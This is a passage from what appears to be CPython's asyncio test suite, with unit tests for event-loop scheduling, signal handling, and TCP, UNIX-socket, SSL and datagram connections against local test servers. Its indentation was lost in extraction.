transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if loop is not None:
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyReadPipeProto(asyncio.Protocol):
done = None
def __init__(self, loop=None):
self.state = ['INITIAL']
self.nbytes = 0
self.transport = None
if loop is not None:
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == ['INITIAL'], self.state
self.state.append('CONNECTED')
def data_received(self, data):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == ['INITIAL', 'CONNECTED'], self.state
self.state.append('EOF')
def connection_lost(self, exc):
if 'EOF' not in self.state:
self.state.append('EOF') # It is okay if EOF is missed.
assert self.state == ['INITIAL', 'CONNECTED', 'EOF'], self.state
self.state.append('CLOSED')
if self.done:
self.done.set_result(None)
class MyWritePipeProto(asyncio.BaseProtocol):
done = None
def __init__(self, loop=None):
self.state = 'INITIAL'
self.transport = None
if loop is not None:
self.done = loop.create_future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MySubprocessProtocol(asyncio.SubprocessProtocol):
def __init__(self, loop):
self.state = 'INITIAL'
self.transport = None
self.connected = loop.create_future()
self.completed = loop.create_future()
self.disconnects = {fd: loop.create_future() for fd in range(3)}
self.data = {1: b'', 2: b''}
self.returncode = None
self.got_data = {1: asyncio.Event(loop=loop),
2: asyncio.Event(loop=loop)}
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
self.connected.set_result(None)
def connection_lost(self, exc):
assert self.state == 'CONNECTED', self.state
self.state = 'CLOSED'
self.completed.set_result(None)
def pipe_data_received(self, fd, data):
assert self.state == 'CONNECTED', self.state
self.data[fd] += data
self.got_data[fd].set()
def pipe_connection_lost(self, fd, exc):
assert self.state == 'CONNECTED', self.state
if exc:
self.disconnects[fd].set_exception(exc)
else:
self.disconnects[fd].set_result(exc)
def process_exited(self):
assert self.state == 'CONNECTED', self.state
self.returncode = self.transport.get_returncode()
class EventLoopTestsMixin:
def setUp(self):
super().setUp()
self.loop = self.create_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
# just in case if we have transport close callbacks
if not self.loop.is_closed():
test_utils.run_briefly(self.loop)
self.doCleanups()
support.gc_collect()
super().tearDown()
def test_run_until_complete_nesting(self):
async def coro1():
await asyncio.sleep(0)
async def coro2():
self.assertTrue(self.loop.is_running())
self.loop.run_until_complete(coro1())
with self.assertWarnsRegex(
RuntimeWarning,
r"coroutine \S+ was never awaited"
):
self.assertRaises(
RuntimeError, self.loop.run_until_complete, coro2())
# Note: because of the default Windows timing granularity of
# 15.6 msec, we use fairly long sleep times here (~100 msec).
def test_run_until_complete(self):
t0 = self.loop.time()
self.loop.run_until_complete(asyncio.sleep(0.1))
t1 = self.loop.time()
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_run_until_complete_stopped(self):
async def cb():
self.loop.stop()
await asyncio.sleep(0.1)
task = cb()
self.assertRaises(RuntimeError,
self.loop.run_until_complete, task)
def test_call_later(self):
results = []
def callback(arg):
results.append(arg)
self.loop.stop()
self.loop.call_later(0.1, callback, 'hello world')
t0 = time.monotonic()
self.loop.run_forever()
t1 = time.monotonic()
self.assertEqual(results, ['hello world'])
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_call_soon(self):
results = []
def callback(arg1, arg2):
results.append((arg1, arg2))
self.loop.stop()
self.loop.call_soon(callback, 'hello', 'world')
self.loop.run_forever()
self.assertEqual(results, [('hello', 'world')])
def test_call_soon_threadsafe(self):
results = []
lock = threading.Lock()
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
def run_in_thread():
self.loop.call_soon_threadsafe(callback, 'hello')
lock.release()
lock.acquire()
t = threading.Thread(target=run_in_thread)
t.start()
with lock:
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
t.join()
self.assertEqual(results, ['hello', 'world'])
def test_call_soon_threadsafe_same_thread(self):
results = []
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
self.loop.call_soon_threadsafe(callback, 'hello')
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
self.assertEqual(results, ['hello', 'world'])
def test_run_in_executor(self):
def run(arg):
return (arg, threading.get_ident())
f2 = self.loop.run_in_executor(None, run, 'yo')
res, thread_id = self.loop.run_until_complete(f2)
self.assertEqual(res, 'yo')
self.assertNotEqual(thread_id, threading.get_ident())
def test_run_in_executor_cancel(self):
called = False
def patched_call_soon(*args):
nonlocal called
called = True
def run():
time.sleep(0.05)
f2 = self.loop.run_in_executor(None, run)
f2.cancel()
self.loop.run_until_complete(
self.loop.shutdown_default_executor())
self.loop.close()
self.loop.call_soon = patched_call_soon
self.loop.call_soon_threadsafe = patched_call_soon
time.sleep(0.4)
self.assertFalse(called)
def test_reader_callback(self):
r, w = socket.socketpair()
r.setblocking(False)
bytes_read = bytearray()
def reader():
try:
data = r.recv(1024)
except BlockingIOError:
# Spurious readiness notifications are possible
# at least on Linux -- see man select.
return
if data:
bytes_read.extend(data)
else:
self.assertTrue(self.loop.remove_reader(r.fileno()))
r.close()
self.loop.add_reader(r.fileno(), reader)
self.loop.call_soon(w.send, b'abc')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 3)
self.loop.call_soon(w.send, b'def')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 6)
self.loop.call_soon(w.close)
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(bytes_read, b'abcdef')
def test_writer_callback(self):
r, w = socket.socketpair()
w.setblocking(False)
def writer(data):
w.send(data)
self.loop.stop()
data = b'x' * 1024
self.loop.add_writer(w.fileno(), writer, data)
self.loop.run_forever()
self.assertTrue(self.loop.remove_writer(w.fileno()))
self.assertFalse(self.loop.remove_writer(w.fileno()))
w.close()
read = r.recv(len(data) * 2)
r.close()
self.assertEqual(read, data)
@unittest.skipUnless(hasattr(signal, 'SIGKILL'), 'No SIGKILL')
def test_add_signal_handler(self):
caught = 0
def my_handler():
nonlocal caught
caught += 1
# Check error behavior first.
self.assertRaises(
TypeError, self.loop.add_signal_handler, 'boom', my_handler)
self.assertRaises(
TypeError, self.loop.remove_signal_handler, 'boom')
self.assertRaises(
ValueError, self.loop.add_signal_handler, signal.NSIG+1,
my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, signal.NSIG+1)
self.assertRaises(
ValueError, self.loop.add_signal_handler, 0, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, 0)
self.assertRaises(
ValueError, self.loop.add_signal_handler, -1, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, -1)
self.assertRaises(
RuntimeError, self.loop.add_signal_handler, signal.SIGKILL,
my_handler)
# Removing SIGKILL doesn't raise, since we don't call signal().
self.assertFalse(self.loop.remove_signal_handler(signal.SIGKILL))
# Now set a handler and handle it.
self.loop.add_signal_handler(signal.SIGINT, my_handler)
os.kill(os.getpid(), signal.SIGINT)
test_utils.run_until(self.loop, lambda: caught)
# Removing it should restore the default handler.
self.assertTrue(self.loop.remove_signal_handler(signal.SIGINT))
self.assertEqual(signal.getsignal(signal.SIGINT),
signal.default_int_handler)
# Removing again returns False.
self.assertFalse(self.loop.remove_signal_handler(signal.SIGINT))
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_while_selecting(self):
# Test with a signal actually arriving during a select() call.
caught = 0
def my_handler():
nonlocal caught
caught += 1
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler)
signal.setitimer(signal.ITIMER_REAL, 0.01, 0) # Send SIGALRM once.
self.loop.call_later(60, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_args(self):
some_args = (42,)
caught = 0
def my_handler(*args):
nonlocal caught
caught += 1
self.assertEqual(args, some_args)
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler, *some_args)
signal.setitimer(signal.ITIMER_REAL, 0.1, 0) # Send SIGALRM once.
self.loop.call_later(60, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
def _basetest_create_connection(self, connection_fut, check_sockname=True):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertIs(pr.transport, tr)
if check_sockname:
self.assertIsNotNone(tr.get_extra_info('sockname'))
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def test_create_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = self.loop.create_connection(
lambda: MyProto(loop=self.loop), *httpd.address)
self._basetest_create_connection(conn_fut)
@socket_helper.skip_unless_bind_unix_socket
def test_create_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not broken_unix_getsockname()
with test_utils.run_test_unix_server() as httpd:
conn_fut = self.loop.create_unix_connection(
lambda: MyProto(loop=self.loop), httpd.address)
self._basetest_create_connection(conn_fut, check_sockname)
def check_ssl_extra_info(self, client, check_sockname=True,
peername=None, peercert={}):
if check_sockname:
self.assertIsNotNone(client.get_extra_info('sockname'))
if peername:
self.assertEqual(peername,
client.get_extra_info('peername'))
else:
self.assertIsNotNone(client.get_extra_info('peername'))
self.assertEqual(peercert,
client.get_extra_info('peercert'))
# test SSL cipher
cipher = client.get_extra_info('cipher')
self.assertIsInstance(cipher, tuple)
self.assertEqual(len(cipher), 3, cipher)
self.assertIsInstance(cipher[0], str)
self.assertIsInstance(cipher[1], str)
self.assertIsInstance(cipher[2], int)
# test SSL object
sslobj = client.get_extra_info('ssl_object')
self.assertIsNotNone(sslobj)
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
self.assertEqual(sslobj.cipher(),
client.get_extra_info('cipher'))
self.assertEqual(sslobj.getpeercert(),
client.get_extra_info('peercert'))
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
def _basetest_create_ssl_connection(self, connection_fut,
check_sockname=True,
peername=None):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertTrue('ssl' in tr.__class__.__name__.lower())
self.check_ssl_extra_info(tr, check_sockname, peername)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def _test_create_ssl_connection(self, httpd, create_connection,
check_sockname=True, peername=None):
conn_fut = create_connection(ssl=test_utils.dummy_ssl_context())
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
# ssl.Purpose was introduced in Python 3.4
if hasattr(ssl, 'Purpose'):
def _dummy_ssl_create_context(purpose=ssl.Purpose.SERVER_AUTH, *,
cafile=None, capath=None,
cadata=None):
"""
A ssl.create_default_context() replacement that doesn't enable
cert validation.
"""
self.assertEqual(purpose, ssl.Purpose.SERVER_AUTH)
return test_utils.dummy_ssl_context()
# With ssl=True, ssl.create_default_context() should be called
with mock.patch('ssl.create_default_context',
side_effect=_dummy_ssl_create_context) as m:
conn_fut = create_connection(ssl=True)
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(m.call_count, 1)
# With the real ssl.create_default_context(), certificate
# validation will fail
with self.assertRaises(ssl.SSLError) as cm:
conn_fut = create_connection(ssl=True)
# Ignore the "SSL handshake failed" log in debug mode
with test_utils.disable_logger():
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(cm.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_connection(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_connection,
lambda: MyProto(loop=self.loop),
*httpd.address)
self._test_create_ssl_connection(httpd, create_connection,
peername=httpd.address)
@socket_helper.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not broken_unix_getsockname()
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_unix_connection,
lambda: MyProto(loop=self.loop), httpd.address,
server_hostname='127.0.0.1')
self._test_create_ssl_connection(httpd, create_connection,
check_sockname,
peername=httpd.address)
def test_create_connection_local_addr(self):
with test_utils.run_test_server() as httpd:
port = socket_helper.find_unused_port()
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=(httpd.address[0], port))
tr, pr = self.loop.run_until_complete(f)
expected = pr.transport.get_extra_info('sockname')[1]
self.assertEqual(port, expected)
tr.close()
def test_create_connection_local_addr_in_use(self):
with test_utils.run_test_server() as httpd:
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=httpd.address)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
self.assertIn(str(httpd.address), cm.exception.strerror)
def test_connect_accepted_socket(self, server_ssl=None, client_ssl=None):
loop = self.loop
class MyProto(MyBaseProto):
def connection_lost(self, exc):
super().connection_lost(exc)
loop.call_soon(loop.stop)
def data_received(self, data):
super().data_received(data)
self.transport.write(expected_response)
lsock = socket.create_server(('127.0.0.1', 0), backlog=1)
addr = lsock.getsockname()
message = b'test data'
response = None
expected_response = b'roger'
def client():
nonlocal response
try:
csock = socket.socket()
if client_ssl is not None:
csock = client_ssl.wrap_socket(csock)
csock.connect(addr)
csock.sendall(message)
response = csock.recv(99)
csock.close()
except Exception as exc:
print(
"Failure in client thread in test_connect_accepted_socket",
exc)
thread = threading.Thread(target=client, daemon=True)
thread.start()
conn, _ = lsock.accept()
proto = MyProto(loop=loop)
proto.loop = loop
loop.run_until_complete(
loop.connect_accepted_socket(
(lambda: proto), conn, ssl=server_ssl))
loop.run_forever()
proto.transport.close()
lsock.close()
support.join_thread(thread)
self.assertFalse(thread.is_alive())
self.assertEqual(proto.state, 'CLOSED')
self.assertEqual(proto.nbytes, len(message))
self.assertEqual(response, expected_response)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_ssl_connect_accepted_socket(self):
if (sys.platform == 'win32' and
sys.version_info < (3, 5) and
isinstance(self.loop, proactor_events.BaseProactorEventLoop)
):
raise unittest.SkipTest(
'SSL not supported with proactor event loops before Python 3.5'
)
server_context = test_utils.simple_server_sslcontext()
client_context = test_utils.simple_client_sslcontext()
self.test_connect_accepted_socket(server_context, client_context)
def test_connect_accepted_socket_ssl_timeout_for_plain_socket(self):
sock = socket.socket()
self.addCleanup(sock.close)
coro = self.loop.connect_accepted_socket(
MyProto, sock, ssl_handshake_timeout=support.LOOPBACK_TIMEOUT)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
@mock.patch('asyncio.base_events.socket')
def create_server_multiple_hosts(self, family, hosts, mock_sock):
async def getaddrinfo(host, port, *args, **kw):
if family == socket.AF_INET:
return [(family, socket.SOCK_STREAM, 6, '', (host, port))]
else:
return [(family, socket.SOCK_STREAM, 6, '', (host, port, 0, 0))]
def getaddrinfo_task(*args, **kwds):
return self.loop.create_task(getaddrinfo(*args, **kwds))
unique_hosts = set(hosts)
if family == socket.AF_INET:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80) for host in unique_hosts]
else:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80, 0, 0) for host in unique_hosts]
self.loop.getaddrinfo = getaddrinfo_task
self.loop._start_serving = mock.Mock()
self.loop._stop_serving = mock.Mock()
f = self.loop.create_server(lambda: MyProto(self.loop), hosts, 80)
server = self.loop.run_until_complete(f)
self.addCleanup(server.close)
server_hosts = {sock.getsockbyname()[0] for sock in server.sockets}
self.assertEqual(server_hosts, unique_hosts)
def test_create_server_multiple_hosts_ipv4(self):
self.create_server_multiple_hosts(socket.AF_INET,
['1.2.3.4', '5.6.7.8', '1.2.3.4'])
def test_create_server_multiple_hosts_ipv6(self):
self.create_server_multiple_hosts(socket.AF_INET6,
['::1', '::2', '::1'])
def test_create_server(self):
proto = MyProto(self.loop)
f = self.loop.create_server(lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('sockname'))
self.assertEqual('127.0.0.1',
proto.transport.get_extra_info('peername')[0])
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'SO_REUSEPORT'), 'No SO_REUSEPORT')
def test_create_server_reuse_port(self):
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
test_utils.run_briefly(self.loop)
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0, reuse_port=True)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
def _make_unix_server(self, factory, **kwargs):
path = test_utils.gen_unix_socket_path()
self.addCleanup(lambda: os.path.exists(path) and os.unlink(path))
f = self.loop.create_unix_server(factory, path, **kwargs)
server = self.loop.run_until_complete(f)
return server, path
@socket_helper.skip_unless_bind_unix_socket
def test_create_unix_server(self):
proto = MyProto(loop=self.loop)
server, path = self._make_unix_server(lambda: proto)
self.assertEqual(len(server.sockets), 1)
client = socket.socket(socket.AF_UNIX)
client.connect(path)
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_path_socket_error(self):
proto = MyProto(loop=self.loop)
sock = socket.socket()
with sock:
f = self.loop.create_unix_server(lambda: proto, '/test', sock=sock)
with self.assertRaisesRegex(ValueError,
'path and sock can not be specified '
'at the same time'):
self.loop.run_until_complete(f)
def _create_ssl_context(self, certfile, keyfile=None):
sslcontext = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslcontext.options |= ssl.OP_NO_SSLv2
sslcontext.load_cert_chain(certfile, keyfile)
return sslcontext
def _make_ssl_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
f = self.loop.create_server(factory, '127.0.0.1', 0, ssl=sslcontext)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '127.0.0.1')
return server, host, port
def _make_ssl_unix_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
return self._make_unix_server(factory, ssl=sslcontext)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
f_c = self.loop.create_connection(MyBaseProto, host, port,
ssl=test_utils.dummy_ssl_context())
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@socket_helper.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
f_c = self.loop.create_unix_connection(
MyBaseProto, path, ssl=test_utils.dummy_ssl_context(),
server_hostname='')
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
@socket_helper.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='invalid')
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_match_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(
cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# incorrect server_hostname
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(
ssl.CertificateError,
"IP address mismatch, certificate is not valid for "
"'127.0.0.1'"):
self.loop.run_until_complete(f_c)
# close connection
# transport is None because TLS ALERT aborted the handshake
self.assertIsNone(proto.transport)
server.close()
@socket_helper.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port),
peercert=test_utils.PEERCERT)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_create_server_sock(self):
proto = self.loop.create_future()
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
proto.set_result(self)
sock_ob = socket.create_server(('0.0.0.0', 0))
f = self.loop.create_server(TestMyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
self.assertEqual(sock.fileno(), sock_ob.fileno())
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
def test_create_server_addr_in_use(self):
sock_ob = socket.create_server(('0.0.0.0', 0))
f = self.loop.create_server(MyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
f = self.loop.create_server(MyProto, host=host, port=port)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
server.close()
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_server_dual_stack(self):
f_proto = self.loop.create_future()
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
f_proto.set_result(self)
try_count = 0
while True:
try:
port = socket_helper.find_unused_port()
f = self.loop.create_server(TestMyProto, host=None, port=port)
server = self.loop.run_until_complete(f)
except OSError as ex:
if ex.errno == errno.EADDRINUSE:
try_count += 1
self.assertGreaterEqual(5, try_count)
continue
else:
raise
else:
break
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
f_proto = self.loop.create_future()
client = socket.socket(socket.AF_INET6)
client.connect(('::1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
server.close()
def test_server_close(self):
f = self.loop.create_server(MyProto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
client = socket.socket()
self.assertRaises(
ConnectionRefusedError, client.connect, ('127.0.0.1', port))
client.close()
def _test_create_datagram_endpoint(self, local_addr, family):
class TestMyDatagramProto(MyDatagramProto):
def __init__(inner_self):
super().__init__(loop=self.loop)
def datagram_received(self, data, addr):
super().datagram_received(data, addr)
self.transport.sendto(b'resp:'+data, addr)
coro = self.loop.create_datagram_endpoint(
TestMyDatagramProto, local_addr=local_addr, family=family)
s_transport, server = self.loop.run_until_complete(coro)
sockname = s_transport.get_extra_info('sockname')
host, port = socket.getnameinfo(
sockname, socket.NI_NUMERICHOST|socket.NI_NUMERICSERV)
self.assertIsInstance(s_transport, asyncio.Transport)
self.assertIsInstance(server, TestMyDatagramProto)
self.assertEqual('INITIALIZED', server.state)
self.assertIs(server.transport, s_transport)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
remote_addr=(host, port))
transport, client = self.loop.run_until_complete(coro)
